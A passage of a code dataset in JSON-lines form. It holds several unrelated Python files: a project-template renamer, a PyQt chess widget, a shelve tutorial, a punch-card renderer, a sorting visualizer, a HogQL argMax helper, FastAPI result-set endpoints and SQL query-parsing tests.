python3\n\"\"\"\n========================================\nRenameTEMPLATE_PyPROJECT - helper module\n========================================\n\nOverview\n========\nThis module helps to start a new Python project using: TEMPLATE_PyPROJECT\n\n#. Replaces all occurrences of ``TEMPLATE_PyPROJECT`` with ``NEW_PROJECT_NAME``\n#. Replaces all occurrences of ``template_pyproject`` with ``NEW_PROJECT_NAME lower case``\n#. Replaces all occurrences of ``TEMPLATE__OneLine_PyPROJECT_Description`` with ``NEW_PROJECT_ONE_LINE_DESCRIPTION``\n#. Renames all File which contain in their name: ``TEMPLATE_PyPROJECT`` with ``NEW_PROJECT_NAME``\n#. Renames all Folder/SubFolder with name: ``TEMPLATE_PyPROJECT`` with ``NEW_PROJECT_NAME``\n\nMust be removed from the project\n\"\"\"\nfrom os import (\n rename as os_rename,\n walk as os_walk,\n)\nfrom os.path import (\n basename as path_basename,\n dirname as path_dirname,\n isdir as path_isdir,\n join as path_join,\n)\n\n\n# ===========================================================================================================================\n# CONFIGURE - HERE\n# ===========================================================================================================================\n\n# Path to the ``TEMPLATE_PyPROJECT`` which should be renamed\nTEMPLATE_PyPROJECT_DIR_PATH = '/home/PycharmProjects/TEMPLATE_PyPROJECT'\n\n# New Project Name\nNEW_PROJECT_NAME = 'XXX'\n\n# New Project One Line Description: may not contain double quotes ``\"``\nNEW_PROJECT_ONE_LINE_DESCRIPTION = \"XXX Description\"\n\n# Any file to be skipped reading and replacing names: just the name: example: binary files like images\nSkipFileNames = [\n 'P-Projects32_32.ico',\n]\n\n# ===========================================================================================================================\n# END CONFIGURE\n# ===========================================================================================================================\n\n\n# check no \" double quote in: NEW_PROJECT_ONE_LINE_DESCRIPTION\nif '\"' in NEW_PROJECT_ONE_LINE_DESCRIPTION:\n print('''\n\n\n ATTENTION::::::The Specified NEW_PROJECT_ONE_LINE_DESCRIPTION may not contain double quotes <\">\n\n We got: NEW_PROJECT_ONE_LINE_DESCRIPTION:\n <{}>\n\n '''.format(NEW_PROJECT_ONE_LINE_DESCRIPTION))\n raise Exception\n\n\n\nNewProjectName__lower_case = NEW_PROJECT_NAME.lower()\nOrigTemplateName__lower_case = 'template_pyproject'\n\nOrigTemplateName = 'TEMPLATE_PyPROJECT'\n\nOrigTemplateOneLineDescription = 'TEMPLATE__OneLine_PyPROJECT_Description'\n\n# check that the TEMPLATE_PyPROJECT_DIR_PATH dir exist\nif not path_isdir(TEMPLATE_PyPROJECT_DIR_PATH):\n # noinspection PyPep8\n raise Exception('\\n\\n\\nATTENTION::::::The Specified TEMPLATE_PyPROJECT_DIR_PATH Dir does not exist:\\n<{}>\\n\\n'.format(TEMPLATE_PyPROJECT_DIR_PATH))\n\n\nDirList = []\nFileList = []\nfor root, dirs, files in os_walk(TEMPLATE_PyPROJECT_DIR_PATH, topdown=False):\n for dir_ in dirs:\n DirList.append((root, dir_))\n for file_ in files:\n FileList.append((root, file_))\n\n\n# FIRST: replace text in Files\nfor root, file_ in FileList:\n file_path = path_join(root, file_)\n # check SkipFileNames\n if path_basename(file_path) in SkipFileNames:\n continue\n with open(file_path, 'r') as file_p:\n file_content = file_p.read()\n\n if OrigTemplateName in file_content:\n file_content = file_content.replace(OrigTemplateName, NEW_PROJECT_NAME)\n\n if OrigTemplateName__lower_case in file_content:\n file_content = file_content.replace(OrigTemplateName__lower_case, NewProjectName__lower_case)\n\n if OrigTemplateOneLineDescription in file_content:\n file_content = file_content.replace(OrigTemplateOneLineDescription, NEW_PROJECT_ONE_LINE_DESCRIPTION)\n\n with open(file_path, 'w') as file_p:\n file_p.write(file_content)\n\n\n# SECOND: replace File Names\nfor root, file_name in FileList:\n if OrigTemplateName in file_name:\n new_file_name = file_name.replace(OrigTemplateName, NEW_PROJECT_NAME)\n os_rename(path_join(root, file_name), path_join(root, new_file_name))\n\n\n# THIRD: replace Dir Names\nfor root, dir_ in DirList:\n if dir_ == OrigTemplateName:\n os_rename(path_join(root, dir_), path_join(root, NEW_PROJECT_NAME))\n\n\n# FINALLY: rename the Root folder\nNewPathName = '{}/{}'.format(path_dirname(TEMPLATE_PyPROJECT_DIR_PATH), NEW_PROJECT_NAME)\nos_rename(TEMPLATE_PyPROJECT_DIR_PATH, NewPathName)\n\nprint('\\nFINISHED....\\n')\n","repo_name":"peter1000/TEMPLATE_PyPROJECT","sub_path":"RenameTEMPLATE_PyPROJECT.py","file_name":"RenameTEMPLATE_PyPROJECT.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36945389438","text":"from PyQt5.QtCore import Qt\r\nfrom PyQt5.QtGui import QPixmap\r\nfrom PyQt5.QtWidgets import QLabel\r\nfrom chessboard import chessboard\r\n\r\n\r\nclass chess(QLabel):\r\n def __init__(self, parent=None, color=None, size=None):\r\n super().__init__(parent)\r\n self.color = color\r\n if color == chessboard.BLACK:\r\n self.pixmap = QPixmap(\"image/black.png\")\r\n else:\r\n self.pixmap = QPixmap(\"image/white.png\")\r\n\r\n self.setPixmap(self.pixmap.scaled(\r\n size, size, Qt.KeepAspectRatio, Qt.SmoothTransformation))\r\n\r\n def resize_chess(self, size):\r\n self.resize(size, size)\r\n self.setPixmap(self.pixmap.scaled(\r\n size, size, Qt.KeepAspectRatio, Qt.SmoothTransformation))\r\n","repo_name":"milab-neuq/chess_gui","sub_path":"nogo_gui/chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30161941010","text":"import shelve\n# Shelves are databases files and their purpose is to aid in the memory\n# consumption. Less memory reserved. Values are pickled before stored.\n# Shelve keys MUST BE strings!!!\n\n# with shelve.open('ShelfTest') as fruit: # if we want to safely exit\nfruit = shelve.open('ShelfTest')\n# we can also define fruit as a dictionary immediately!\nfruit['orange'] = \"a sweet, orange, citrus fruit\"\nfruit['apple'] = \"good for making cider\"\nfruit['lemon'] = \"a sour, yellow citrus fruit\"\nfruit['grape'] = \"a small, sweet fruit growing in bunches\"\nfruit['lime'] = \"a sour, green citrus fruit\"\n\n# print(fruit[\"lemon\"])\n# print(fruit[\"grape\"])\n####\n# fruit[\"lime\"] = \"great with tequila\"\n#\n# for snack in fruit:\n# print(snack + \": \" + fruit[snack])\n\n# Checking and printing the dictionary contains:\n\n# while True:\n# dict_key = input(\"Please enter a fruit: \").lower()\n# if dict_key == \"quit\" or dict_key == \"q\":\n# break\n# # 2 ways to do it (get method):\n# # description = fruit.get(dict_key, 'Wrong entry: ' + dict_key)\n# # print(description)\n#\n# if dict_key in fruit:\n# description = fruit[dict_key]\n# print(description)\n# else:\n# print(\"We don't have a \" + dict_key)\n\n# Ordering the random ordered keys in the dictionary:\n\n# ordered_keys = list(fruit.keys())\n# ordered_keys.sort()\n#\n# for f in ordered_keys:\n# print(f + \" - \" + fruit[f])\n\n# Printing the values and the items in the database:\nfor v in fruit.values():\n print(v)\n\nprint(fruit.values())\n\nfor f in fruit.items():\n print(f)\n\nprint(fruit.items())\n\n\n# print(fruit) # not printing the entire dictionary entries!!!\nfruit.close() # needed if not using with to open file; manually close.\n\nprint(fruit)\n\n\n##########################\nprint()\n##########################\n\n\n# with shelve.open(\"bike\") as bike:\n# # bike[\"make\"] = \"Honda\"\n# # bike[\"model\"] = \"250 dream\"\n# # bike[\"colour\"] = \"red\"\n# # bike[\"engine_size\"] = 250\n#\n# # del bike['engin_size'] # Deleting from the database\n#\n# for key in bike:\n# print(key)\n#\n# print('=' * 40)\n#\n# print(bike[\"engine_size\"])\n# # print(bike[\"engin_size\"])\n# print(bike[\"colour\"])\n\n##############################\n########## IMPORTANT!!! ###########\n# Every time we run the program, if the database file exists, it\n# will append the new entries and change the existing ones, rather\n# than erasing the entire database and creating a whole new one\n# from the beginning.\n\n##############################\n##############################\n\n\nblt = [\"bacon\", \"lettuce\", \"tomato\", \"bread\"]\nbeans_on_toast = [\"beans\", \"bread\"]\nscrambled_eggs = [\"eggs\", \"butter\", \"milk\"]\nsoup = [\"tin of soup\"]\npasta = [\"pasta\", \"cheese\"]\n\n# with shelve.open('recipes') as recipes:\nwith shelve.open('recipes', writeback=True) as recipes: # for writing\n# immediately, without using temp var.\n recipes[\"blt\"] = blt\n recipes[\"beans on toast\"] = beans_on_toast\n recipes[\"scrambled eggs\"] = scrambled_eggs\n recipes[\"pasta\" ] = pasta\n recipes[\"soup\"] = soup\n\n # recipes[\"blt\"].append(\"butter\")\n # recipes[\"pasta\"].append(\"tomato\")\n\n# The reason for using a temp var, is because of shelve's functionality\n# that tries to minimise the disk usage and therefore this happens.\n\n # temp_list = recipes[\"blt\"]\n # temp_list.append(\"butter\")\n # recipes[\"blt\"] = temp_list\n #\n # temp_list = recipes[\"pasta\"]\n # temp_list.append(\"tomato\")\n # recipes[\"pasta\"] = temp_list\n\n# works a lot with writeback set to True only\n recipes[\"soup\"].append(\"croutons\")\n\n # recipes[\"soup\"] = soup\n # recipes.sync() # forces the cache to unload, but also clears it.\n # soup.append(\"cream\")\n\n for snack in recipes:\n print(snack, recipes[snack])\n","repo_name":"nsotiriou88/Python","sub_path":"Training/Shelve Database.py","file_name":"Shelve Database.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73492355688","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport sys\nfrom PIL import Image, ImageDraw\nimport zipfile\nimport configparser\n#Takes a card coordinate (R6.B22) and converts it to an x,y coordinate (51,11)\ndef coord2xy(coord):\n assert coord[2]=='.'\n if coord[0] in 'sS':\n y=8\n elif coord[0] in 'rR':\n y=17\n else:\n raise \"Row prefix must be [RS]\"\n y-=int(coord[1])\n if coord[3] in 'aA':\n x=0\n elif coord[3] in 'bB':\n x=39\n else:\n raise \"Column prefix must be [AB]\"\n if coord[4] in 'aA':\n x=30\n elif coord[4] in 'bB':\n x=38\n else:\n x+=int(coord[4])*5\n x+=int(coord[5])\n return x,y\n\n#Clears a punch (card coordinates)\ndef clearbit(coord):\n global bits\n x,y=coord2xy(coord)\n print(\"Clearing\",x,y) \n bits[y][x]=False\n\n#Sets a punch (card coordinates)\ndef setbit(coord):\n global bits\n x,y=coord2xy(coord)\n print(\"Setting\",x,y) \n bits[y][x]=True\n\n\nbits=[[False for x in range(69)] for y in range(18)]\n\n#Set the punches here\nfor bit in [ 'R0.A14','R0.A22','R0.A31','R0.A33','R0.A44','R0.A50','R0.A51',\n 'R1.A00','R1.A03','R1.A12','R1.A13','R1.A14','R1.A17','R1.A31','R1.A33','R1.A44','R1.A50',\n 'R6.A53',\n 'S1.A14',\n 'S2.A00','S2.A10','S2.A22',\n 'S3.A00','S3.A20',\n 'S7.A00','S7.A02',\n 'S8.A00','S8.A30','S8.A40','S8.A54']:\n setbit(bit)\n\nfor bit in [ 'R0.B03','R0.B04','R0.B11','R0.B13','R0.B20','R0.B21','R0.B33','R0.B34','R0.B40','R0.B42','R0.B50','R0.B54',\n 'R5.B53',\n 'R6.B22','R6.B30',\n 'R7.B22','R7.B30',\n 'S0.B00',\n 'S7.B12','S7.B13',\n 'S8.B00','S8.B01','S8.B10','S8.B11','S8.A54']:\n setbit(bit)\n\n#Got some good good ascii art\nsys.stdout.write('+'+('—'*69)+'+\\n')\nfor y in range(18):\n sys.stdout.write('|')\n for x in range(69): #nice\n if x==31 or x==37:\n sys.stdout.write('|')\n elif x>31 and x<37:\n sys.stdout.write(' ')\n else:\n sys.stdout.write('#' if bits[y][x] else '·')\n sys.stdout.write('|\\n')\nsys.stdout.write('+'+('—'*69)+'+\\n')\n\nwith zipfile.ZipFile('cardpack.zip') as cardpack:\n f_im=Image.open(cardpack.open('front.png'))\n b_im=Image.open(cardpack.open('back.png'))\n with cardpack.open('offsets.txt') as offsets:\n config=configparser.ConfigParser()\n config.read_string(offsets.read().decode('ASCII'))\n print(config.sections())\n f_origin_x=float(config['Front']['originX'])\n f_origin_y=float(config['Front']['originY'])\n f_offset_x=float(config['Front']['offsetX'])\n f_offset_y=float(config['Front']['offsetY'])\n b_origin_x=float(config['Back' ]['originX'])\n b_origin_y=float(config['Back' ]['originY'])\n b_offset_x=float(config['Back' ]['offsetX'])\n b_offset_y=float(config['Back' ]['offsetY'])\n \n\n #Render the PNGs\n f_draw = ImageDraw.Draw(f_im)\n b_draw = ImageDraw.Draw(b_im)\n for xidx in range(69):\n for yidx in range(18):\n if xidx>30 and xidx<38: continue\n #Don't tell Professor Mead, these numbers are magic\n f_xcen=f_origin_x+(xidx*f_offset_x)\n f_ycen=f_origin_y+(yidx*f_offset_y)\n b_xcen=b_origin_x+(xidx*b_offset_x)\n b_ycen=b_origin_y+(yidx*b_offset_y)\n #It's hole-punchin' time\n if bits[yidx][xidx]:\n f_draw.ellipse([(f_xcen-10,f_ycen-10),(f_xcen+10,f_ycen+10)],'black','black')\n b_draw.ellipse([(b_xcen-10,b_ycen-10),(b_xcen+10,b_ycen+10)],'black','black')\n f_im.save(\"front.png\")\n b_im.save(\"back.png\")\n","repo_name":"chordtoll/troublemaker","sub_path":"cardpunch.py","file_name":"cardpunch.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10113981743","text":"import json\n\n\ndef get_user_info(user_id: int, path: str):\n \"\"\"\n Функция добавления данных текущего пользователя в data машины состояний\n \"\"\"\n name, sh_url, materials = None, None, None\n with open(path, 'r', encoding=\"utf-8\") as file:\n data = json.load(file)\n for key, building_data in data.items():\n users = building_data.get(\"users\", {})\n if str(user_id) in users:\n name = users.get(str(user_id))\n sh_url = building_data.get(\"sh_url\", None)\n materials = building_data.get(\"materials\", {})\n building = key\n return name, sh_url, materials, building\n\n","repo_name":"AmatorX/google_sheets_bot","sub_path":"utils/get_info_about_user.py","file_name":"get_info_about_user.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71677059369","text":"import pygame, sys\nfrom random import randint, shuffle\nfrom time import sleep\n\n\nWIDTH = 800\nHEIGHT = 600\npygame.init()\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREY = (128, 128, 128)\n\n\n# -------------------------- Quick Sort\ndef quick_sort(A, l, r):\n\tif l >= r:\n\t\treturn\n\t\n\tk = randint(l, r - 1)\n\tA[l], A[k] = A[k], A[l]\n\t\n\tm1, m2 = partition_3(A, l, r)\n\tquick_sort(A, l, m1)\n\tquick_sort(A, m2, r)\n\n\ndef partition_3(A, l, r):\n\tpivot = A[l]\n\tj = l\n\tcount = 1\n\tfor i in range(l+1, r):\n\t\tif A[i] < pivot:\n\t\t\tj += 1\n\t\t\tA[i], A[j] = A[j], A[i]\n\t\t\tdraw(A, i, 0.05)\n\t\telif A[i] == pivot:\n\t\t\tcount += 1\n\n\tA[j], A[l] = A[l], A[j]\n\tdraw(A, j, 0.05)\n\treturn j, j + count\n\n\n# -------------------------- Merge Sort\ndef merge_sort(A, l, r):\n\tif len(A[l:r]) == 1:\n\t\treturn A[l:r]\n\n\tm = (l + r + 1) // 2\n\n\tA[l:m] = merge_sort(A, l, m)\n\tA[m:r] = merge_sort(A, m, r)\n\n\treturn merge(A, l, m, r)\n\n\ndef merge(A, l, m, r):\n\tarr_l = A[l:m]\n\tarr_r = A[m:r]\n\tresult = []\n\n\twhile arr_l and arr_r:\n\t\tif arr_l[0] < arr_r[0]:\n\t\t\tresult.append(arr_l.pop(0))\n\t\t\tidx = l\n\t\telse:\n\t\t\tresult.append(arr_r.pop(0))\n\t\t\tidx = l + len(arr_l)\n\t\t\t\n\t\tdraw(A[:l]+arr_l+arr_r+result+A[r:], idx, 0.05)\n\n\twhile arr_l:\n\t\tresult.append(arr_l.pop(0))\n\t\tdraw(A[:l]+arr_l+result+A[r:], 0.05)\n\t\n\twhile arr_r:\n\t\tresult.append(arr_r.pop(0))\n\t\tdraw(A[:l]+arr_r+result+A[r:], 0.05)\n\n\treturn result\n\n\n# -------------------------- Bubble Sort\ndef bubble_sort(A):\n\tfor i in range(len(A)):\n\t\tfor j in range(len(A) - i - 1):\n\t\t\tif A[j] > A[j + 1]:\n\t\t\t\tA[j], A[j + 1] = A[j + 1], A[j]\n\t\t\t\tdraw(A)\n\n\n# -------------------------- Heap Sort\ndef heap_sort(A):\n\tbuild_heap(A)\n\n\tresult = []\n\tfor _ in range(len(A)):\n\t\tA[0], A[-1] = A[-1], A[0]\n\t\tresult.append(A.pop())\n\t\tif A:\n\t\t\tsift_down(A, 0)\n\t\t\n\t\tdraw(A+result, -1, 0.05)\n\treturn result\n\n\ndef build_heap(A):\n\tfor i in reversed(range(len(A) // 2)):\n\t\tsift_down(A, i)\n\n\ndef sift_down(A, i):\n\tcurr = A[i]\n\n\tl = i * 2 + 1\n\tif l < len(A) and A[l] < A[i]:\n\t\tA[l], A[i] = A[i], A[l]\n\n\tr = i * 2 + 2\n\tif r < len(A) and A[r] < A[i]:\n\t\tA[r], A[i] = A[i], A[r]\n\t\tif has_child(A, r):\n\t\t\tsift_down(A, r)\n\n\tif has_child(A, l):\n\t\tsift_down(A, l)\n\n\ndef has_child(A, i):\n\treturn i <= len(A) // 2 - 1\n\t\n\n# --------------------------\ndef draw(A, idx=-1, speed=0):\n\tscreen.fill(WHITE)\n\tcount = 4\n\tfor i, val in enumerate(A):\n\t\tcount += 4\n\t\tp1 = (20 + i + count, HEIGHT)\n\t\tp2 = (20 + i + count, HEIGHT - val)\n\t\tcolor = RED if i == idx else GREY\n\t\tpygame.draw.line(screen, color, p1, p2, 4)\n\tpygame.display.update()\n\tif speed != 0:\n\t\tsleep(speed)\n\n\ndef get_vals():\n\tA = [i * 3 for i in range(150)]\n\tshuffle(A)\n\tB = [i * 3 for i in reversed(range(150))]\n\treturn [A, B]\n\n\n# --------------------------\ndef main():\n\tvals = get_vals()\n\n\twhile True:\n\t\tdraw(vals[0])\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t\t\tsys.exit()\n\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_SPACE:\n\t\t\t\t\tfor arr in vals:\n\t\t\t\t\t\tdraw(arr)\n\t\t\t\t\t\tsleep(0.5)\n\t\t\t\t\t\t# quick_sort(arr, 0, len(arr))\n\t\t\t\t\t\t# heap_sort(arr)\n\t\t\t\t\t\t# merge_sort(arr, 0, len(arr))\n\t\t\t\t\t\tbubble_sort(arr)\n\t\t\t\t\t\tsleep(1)\n\n\t\t\t\t\tvals = get_vals()\n\n\t\t\t\tif event.key == pygame.K_c:\n\t\t\t\t\tvals = get_vals()\n\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n\n","repo_name":"Jiaweihu08/Visualizing-Sorting-Algorithms","sub_path":"sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"39510802019","text":"from typing import Callable, List, Optional, Dict\n\n\ndef argmax_select(\n table_name: str,\n select_fields: Dict[str, List[str]],\n group_fields: List[str],\n argmax_field: str,\n deleted_field: Optional[str] = None,\n):\n from posthog.hogql import ast\n\n argmax_version: Callable[[ast.Expr], ast.Expr] = lambda field: ast.Call(\n name=\"argMax\", args=[field, ast.Field(chain=[table_name, argmax_field])]\n )\n\n fields_to_group: List[ast.Expr] = []\n fields_to_select: List[ast.Expr] = []\n for name, chain in select_fields.items():\n if name not in group_fields:\n fields_to_select.append(\n ast.Alias(\n alias=name,\n expr=argmax_version(ast.Field(chain=[table_name] + chain)),\n )\n )\n for key in group_fields:\n fields_to_group.append(ast.Field(chain=[table_name, key]))\n fields_to_select.append(ast.Alias(alias=key, expr=ast.Field(chain=[table_name, key])))\n\n select_query = ast.SelectQuery(\n select=fields_to_select,\n select_from=ast.JoinExpr(table=ast.Field(chain=[table_name])),\n group_by=fields_to_group,\n )\n if deleted_field:\n select_query.having = ast.CompareOperation(\n op=ast.CompareOperationOp.Eq,\n left=argmax_version(ast.Field(chain=[table_name, deleted_field])),\n right=ast.Constant(value=0),\n )\n\n return select_query\n","repo_name":"PostHog/posthog","sub_path":"posthog/hogql/database/argmax.py","file_name":"argmax.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"294376048","text":"\"\"\"Endpoints for Jobs\"\"\"\nfrom typing import Any, List\n\nfrom fastapi import APIRouter, Depends, HTTPException, Security, Response\nfrom sqlalchemy.orm import Session\nfrom starlette.status import HTTP_201_CREATED, HTTP_400_BAD_REQUEST, HTTP_404_NOT_FOUND\n\nfrom altimeter.qj import schemas\nfrom altimeter.qj.api import deps\nfrom altimeter.qj.crud.crud_result_set import CRUDResultSet\nfrom altimeter.qj.exceptions import (\n JobVersionNotFound,\n ResultSetNotFound,\n ResultSetResultsLimitExceeded,\n ResultSizeExceeded,\n)\nfrom altimeter.qj.notifier import ResultSetNotifier\n\nRESULT_SETS_ROUTER = APIRouter()\n\n\n@RESULT_SETS_ROUTER.get(\"/result_set/{result_set_id}\", response_model=schemas.ResultSet)\ndef get_result_set(\n *,\n db_session: Session = Depends(deps.db_session),\n result_set_crud: CRUDResultSet = Depends(deps.result_set_crud),\n result_set_id: str,\n result_format: schemas.ResultSetFormat = schemas.ResultSetFormat.json,\n response: Response,\n) -> Any:\n \"\"\"Get a ResultSet by id\"\"\"\n try:\n result_set = result_set_crud.get(db_session, result_set_id=result_set_id)\n response.headers[\"Cache-Control\"] = \"public, max-age=604800, immutable\"\n except ResultSetNotFound as ex:\n raise HTTPException(status_code=HTTP_404_NOT_FOUND, detail=str(ex)) from ex\n if result_format == schemas.ResultSetFormat.csv:\n return Response(content=result_set.to_api_schema().to_csv(), media_type=\"text/csv\")\n return result_set\n\n\n@RESULT_SETS_ROUTER.post(\n \"/result_set\",\n response_model=schemas.ResultSet,\n status_code=HTTP_201_CREATED,\n dependencies=[Security(deps.api_key)],\n)\ndef create_result_set(\n *,\n db_session: Session = Depends(deps.db_session),\n result_set_notifier: ResultSetNotifier = Depends(deps.result_set_notifier),\n result_set_crud: CRUDResultSet = Depends(deps.result_set_crud),\n result_set_in: schemas.ResultSetCreate,\n) -> Any:\n \"\"\"Create a ResultSet\"\"\"\n try:\n result_set = result_set_crud.create(db_session, obj_in=result_set_in)\n if result_set.results:\n if result_set_in.job.notify_if_results:\n result_set_notification = schemas.ResultSetNotification(\n job=result_set_in.job,\n graph_spec=result_set_in.graph_spec,\n created=result_set_in.created,\n num_results=len(result_set_in.results),\n result_set_id=str(result_set.result_set_id),\n )\n result_set_notifier.notify(notification=result_set_notification)\n return result_set\n except (JobVersionNotFound, ResultSetResultsLimitExceeded, ResultSizeExceeded) as ex:\n raise HTTPException(status_code=HTTP_400_BAD_REQUEST, detail=str(ex)) from ex\n\n\n@RESULT_SETS_ROUTER.get(\n \"/expired\",\n response_model=List[schemas.ResultSet],\n dependencies=[Security(deps.api_key)],\n)\ndef get_expired_result_sets(\n *,\n db_session: Session = Depends(deps.db_session),\n result_set_crud: CRUDResultSet = Depends(deps.result_set_crud),\n) -> Any:\n \"\"\"Get all expired ResultSets\"\"\"\n return result_set_crud.get_expired(db_session=db_session)\n\n\n@RESULT_SETS_ROUTER.delete(\n \"/expired\",\n response_model=schemas.ResultSetsPruneResult,\n dependencies=[Security(deps.api_key)],\n)\ndef delete_expired_result_sets(\n *,\n db_session: Session = Depends(deps.db_session),\n result_set_crud: CRUDResultSet = Depends(deps.result_set_crud),\n) -> Any:\n \"\"\"Delete all expired ResultSets\"\"\"\n num_pruned = result_set_crud.delete_expired(db_session=db_session)\n return schemas.ResultSetsPruneResult(num_pruned=num_pruned)\n","repo_name":"tableau/altimeter","sub_path":"altimeter/qj/api/v1/endpoints/result_sets.py","file_name":"result_sets.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"14635890470","text":"from pytest import raises\nfrom rdflib import Variable\n\nfrom mosaicrown.sparql.sparqlparser import extract_object\nfrom mosaicrown.sparql.sparqlparser import extract_predicates\nfrom mosaicrown.sparql.sparqlparser import extract_subject\nfrom mosaicrown.sparql.sparqlparser import parse_SPARQL_query\nfrom mosaicrown.sql.sqlquery import SQLQuery\n\n\n# SELECT\ndef test_select():\n query = \"\"\"\n SELECT student.Id, student.Sex\n FROM student\n \"\"\"\n assert SQLQuery(query).get_targets() == {\"student\": {\"Id\", \"Sex\"}}\n\n\ndef test_select_modifier():\n query = \"\"\"\n SELECT DISTINCT student.Ethnicity\n FROM student\n \"\"\"\n assert SQLQuery(query).get_targets() == {\"student\": {\"Ethnicity\"}}\n\n\ndef test_select_with_subquery():\n query = \"\"\"\n SELECT student.Id, (SELECT MAX(exam.Grade)\n FROM exam\n WHERE exam.StudentId = student.Id)\n FROM student\n \"\"\"\n expectation = {\"student\": {\"Id\"}, \"exam\": {\"StudentId\", \"Grade\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\n# FROM\ndef test_cross_join():\n query = \"\"\"\n SELECT student.Id, exam.Date, exam.CourseId, exam.StudentId\n FROM student, exam\n \"\"\"\n expectation = {\n \"student\": {\"Id\"},\n \"exam\": {\"Date\", \"CourseId\", \"StudentId\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_cross_join_with_subquery():\n query = \"\"\"\n select K.a,K.b\n from (\n select H.b\n from (\n select G.c\n from (\n select F.d\n from (\n select E.e\n from A, B, C, D, E\n ), F\n ), G\n ), H\n ), I, J, K\n \"\"\"\n expectation = {\n \"K\": {\"a\", \"b\"},\n \"H\": {\"b\"},\n \"G\": {\"c\"},\n \"F\": {\"d\"},\n \"E\": {\"e\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_inner_join():\n query = \"\"\"\n SELECT student.Sex, exam.Grade\n FROM student INNER JOIN exam\n ON student.Id = exam.StudentId\n \"\"\"\n expectation = {\"student\": {\"Sex\", \"Id\"}, \"exam\": {\"StudentId\", \"Grade\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_multiple_inner_join():\n query = \"\"\"\n select A.a\n from ((A join B on A.id = B.id) join C on A.id = C.id)\n join (D join (E join F on E.id = F.id) on D.id = E.id)\n on A.id = F.id\n join G on A.id = G.id\n \"\"\"\n expectation = {\n \"A\": {\"id\", \"a\"},\n \"B\": {\"id\"},\n \"C\": {\"id\"},\n \"D\": {\"id\"},\n \"E\": {\"id\"},\n \"F\": {\"id\"},\n \"G\": {\"id\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_inner_join_with_subquery():\n query = \"\"\"\n select A.a\n from (select A.a from A)\n join B on A.a = B.a\n join (select C.c from C) on B.c = C.c\n \"\"\"\n expectation = {\"A\": {\"a\"}, \"B\": {\"a\", \"c\"}, \"C\": {\"c\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_useless_table():\n query = \"\"\"\n SELECT student.Id\n FROM student, exam\n \"\"\"\n assert SQLQuery(query).get_targets() == {\"student\": {\"Id\"}}\n\n\n# WHERE\ndef test_where():\n query = \"\"\"\n SELECT student.Id, exam.CourseId\n FROM student JOIN exam\n ON student.Id = exam.StudentId\n WHERE exam.Grade > 27\n \"\"\"\n expectation = {\n \"student\": {\"Id\"},\n \"exam\": {\"StudentId\", \"CourseId\", \"Grade\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_where_with_subquery():\n query = \"\"\"\n SELECT exam.CourseId, student.Id\n FROM student JOIN exam as outer_exam\n ON student.Id = exam.StudentId\n WHERE exam.Grade = (SELECT MAX(exam.Grade)\n FROM exam\n WHERE exam.CourseId = outer_exam.CourseId)\n \"\"\"\n expectation = {\n \"student\": {\"Id\"},\n \"exam\": {\"StudentId\", \"CourseId\", \"Grade\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\n# GROUP BY ... HAVING ...\ndef test_group_by():\n query = \"\"\"\n SELECT AVG(exam.Grade)\n FROM exam\n GROUP BY exam.CourseId, exam.Date\n \"\"\"\n expectation = {\"exam\": {\"CourseId\", \"Date\", \"Grade\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_group_by_having():\n query = \"\"\"\n SELECT AVG(exam.Grade)\n FROM exam\n GROUP BY exam.CourseId, exam.Date\n HAVING COUNT(exam.StudentId) > 100\n \"\"\"\n expectation = {\"exam\": {\"StudentId\", \"CourseId\", \"Date\", \"Grade\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\n# ORDER BY\ndef test_order_by():\n query = \"\"\"\n SELECT student.Id\n FROM student\n ORDER BY student.BirthDate DESC NULLS LAST,\n student.Income ASC NULLS FIRST\n \"\"\"\n expectation = {\"student\": {\"Id\", \"BirthDate\", \"Income\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_order_by_case():\n query = \"\"\"\n SELECT student.Id\n FROM student\n ORDER BY (CASE\n WHEN student.BirthDate IS NULL THEN student.Id\n ELSE student.BirthDate\n END) DESC NULLS LAST, student.Income ASC NULLS FIRST\n \"\"\"\n expectation = {\"student\": {\"Id\", \"BirthDate\", \"Income\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\n# OPERATIONS\ndef test_operations():\n query = \"\"\"\n SELECT \"CF:\"||professor.Cf,\n 1.5*(professor.Salary+100)-(3)*student.Income\n FROM student\n 